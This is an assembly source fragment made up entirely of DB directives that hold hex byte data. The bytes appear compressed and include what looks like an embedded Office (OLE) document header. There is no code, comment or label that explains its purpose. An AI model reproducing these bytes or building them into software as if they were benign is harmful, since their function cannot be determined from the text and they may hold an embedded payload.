DB 0FCH,002H,004H,00AH,001H,000H,000H,0AAH,0AAH,023H,002H,004H,039H,002H,004H
DB 048H,002H,004H,059H,002H,004H,06EH,002H,004H,082H,002H,004H,098H,002H,004H
DB 0A5H,002H,004H,0AAH,0B2H,0B5H,002H,004H,0C3H,002H,004H,0CBH,002H,004H,0E1H
DB 002H,004H,0F4H,002H,004H,014H,002H,002H,038H,002H,004H,027H,002H,004H,0AAH
DB 0AAH,033H,002H,004H,044H,002H,004H,060H,002H,004H,06BH,002H,004H,075H,002H
DB 004H,08AH,002H,004H,099H,002H,004H,0B9H,002H,004H,04EH,035H,0D8H,002H,004H
DB 073H,0D3H,062H,0C8H,000H,013H,002H,0C5H,0D9H,002H,004H,003H,002H,07CH,00DH
DB 002H,004H,003H,014H,039H,013H,0D4H,0BDH,000H,000H,003H,014H,004H,002H,010H
DB 00CH,002H,004H,003H,014H,003H,010H,005H,002H,00CH,003H,028H,013H,009H,003H
DB 0C4H,083H,002H,010H,0AAH,0AAH,08CH,002H,004H,093H,002H,004H,095H,002H,004H
DB 09CH,002H,004H,0D6H,002H,004H,0DDH,002H,004H,0DFH,002H,004H,0E6H,002H,004H
DB 0AAH,0ADH,014H,002H,09CH,021H,002H,004H,02EH,002H,004H,037H,002H,004H,003H
DB 0C4H,0A3H,002H,008H,003H,0C8H,0B3H,002H,008H,0FBH,002H,004H,0AAH,06AH,002H
DB 002H,090H,007H,002H,004H,012H,002H,004H,0A9H,002H,004H,0B7H,002H,004H,0CAH
DB 002H,004H,0D6H,002H,004H,003H,0A8H,013H,060H,0EDH,021H,095H,000H,013H,011H
DB 002H,004H,003H,008H,01FH,00AH,008H,015H,002H,00CH,003H,018H,01DH,002H,008H
DB 003H,004H,003H,020H,00AH,03CH,01AH,002H,00CH,014H,002H,004H,017H,095H,000H
DB 0FFH,040H,002H,013H,0ABH,002H,086H,084H,0C2H,012H,097H,024H,000H,084H,000H
DB 040H,000H,003H,0CEH,000H,047H,016H,090H,004H,079H,006H,003H,005H,004H,005H
DB 002H,003H,004H,0DEH,0C5H,003H,003H,025H,00AH,004H,002H,01DH,004H,00EH,054H
DB 022H,048H,033H,0EAH,033H,0D2H,04EH,022H,01CH,077H,000H,020H,022H,073H,053H
DB 062H,002H,000H,061H,042H,026H,000H,000H,035H,010H,090H,001H,002H,000H,005H
DB 005H,001H,002H,001H,007H,090H,045H,006H,002H,005H,007H,004H,035H,000H,000H
DB 007H,077H,003H,00FH,080H,003H,005H,053H,000H,079H,032H,02EH,062H,013H,066H
DB 042H,000H,0C3H,046H,033H,022H,004H,07EH,00BH,006H,004H,002H,003H,001H,00FH
DB 07EH,000H,001H,003H,033H,002H,004H,041H,024H,04FH,000H,072H,002H,080H,061H
DB 000H,003H,034H,03BH,002H,004H,06AH,002H,016H,00CH,003H,00FH,06AH,000H,057H
DB 002H,032H,06EH,055H,004H,0C2H,05EH,064H,006H,008H,073H,002H,02FH,022H,002H
DB 0F4H,030H,008H,080H,022H,0A8H,0C4H,002H,000H,000H,0A9H,0EFH,0FFH,007H,05FH
DB 002H,01AH,00FH,003H,009H,010H,004H,033H,047H,009H,00FH,00FH,00AH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 00FH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00CH,010H,0A5H,006H,0C0H,007H,000H
DB 0FFH,0B4H,000H,0B4H,000H,080H,000H,012H,030H,00CH,019H,00FH,00DH,00FH,010H
DB 00FH,010H,00FH,010H,004H,010H,012H,0E3H,002H,008H,000H,08BH,0D0H,0CFH,011H
DB 0E0H,0A1H,0B1H,01AH,0E1H,002H,00BH,00CH,003H,03EH,062H,0F8H,0FEH,0FFH,009H
DB 0E2H,0DAH,0DBH,0D6H,009H,017H,023H,011H,021H,007H,00FH,022H,052H,023H,002H
DB 00CH,003H,014H,0FEH,0B2H,0EDH,002H,00BH,000H,032H,03AH,000H,002H,00BH,00FH
DB 003H,0FFH,00FH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,0FFH

